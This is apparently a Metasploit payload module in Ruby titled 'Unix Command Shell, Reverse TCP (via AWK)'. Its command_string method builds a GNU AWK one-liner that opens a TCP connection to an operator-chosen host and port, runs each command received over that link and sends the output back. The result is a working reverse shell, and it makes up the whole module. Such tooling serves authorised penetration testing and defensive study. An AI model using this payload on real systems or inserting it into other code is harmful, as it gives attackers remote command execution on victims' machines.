1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
module MetasploitModule
7
  CachedSize = 154
8

9
  include Msf::Payload::Single
10
  include Msf::Sessions::CommandShellOptions
11

12
  def initialize(info = {})
13
    super(
14
      merge_info(
15
        info,
16
        'Name' => 'Unix Command Shell, Reverse TCP (via AWK)',
17
        'Description' => 'Creates an interactive shell via GNU AWK',
18
        'Author' => [
19
          'espreto <robertoespreto[at]gmail.com>',
20
          'Ulisses Castro <uss.thebug[at]gmail.com>',
21
          'Gabriel Quadros <gquadrossilva[at]gmail.com>'
22
        ],
23
        'License' => MSF_LICENSE,
24
        'Platform' => 'unix',
25
        'Arch' => ARCH_CMD,
26
        'Handler' => Msf::Handler::ReverseTcp,
27
        'Session' => Msf::Sessions::CommandShell,
28
        'PayloadType' => 'cmd',
29
        'RequiredCmd' => 'gawk',
30
        'Payload' => {
31
          'Offsets' => {},
32
          'Payload' => ''
33
        }
34
      )
35
    )
36
  end
37

38
  #
39
  # Constructs the payload
40
  #
41
  def generate(_opts = {})
42
    super + command_string
43
  end
44

45
  #
46
  # Returns the command string to use for execution
47
  #
48
  def command_string
49
    awkcmd = <<~AWK
50
      awk 'BEGIN{
51
        s=\"/inet/tcp/0/#{datastore['LHOST']}/#{datastore['LPORT']}\";
52
        do{
53
          if((s|&getline c)<=0)
54
            break;
55
          if(c){
56
            while((c|&getline)>0)print $0|&s;
57
            close(c)
58
          }
59
        } while(c!=\"exit\")
60
        close(s)
61
      }'
62
    AWK
63
    awkcmd.gsub!("\n", '').gsub!('  ', '')
64
  end
65
end
66

67